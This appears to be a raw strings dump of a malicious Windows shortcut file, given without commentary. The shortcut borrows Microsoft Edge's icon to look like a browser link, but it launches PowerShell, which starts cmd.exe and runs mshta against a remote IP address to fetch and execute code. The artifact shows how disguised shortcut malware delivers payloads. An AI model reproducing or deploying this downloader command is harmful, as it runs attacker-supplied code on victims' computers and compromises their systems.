Windows
System32
WindowsPowerShell
powershell.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
Windows
System32
WindowsPowerShell
powershell.exe
?..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(New-Object -ComObject Shell.Application).ShellExecute('cmd.exe', '/c start mshta http://193.233.48.64/Downloads/test', $null, 'open', 1)<C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
S-1-5-21-1719625521-4555349-1342932741-500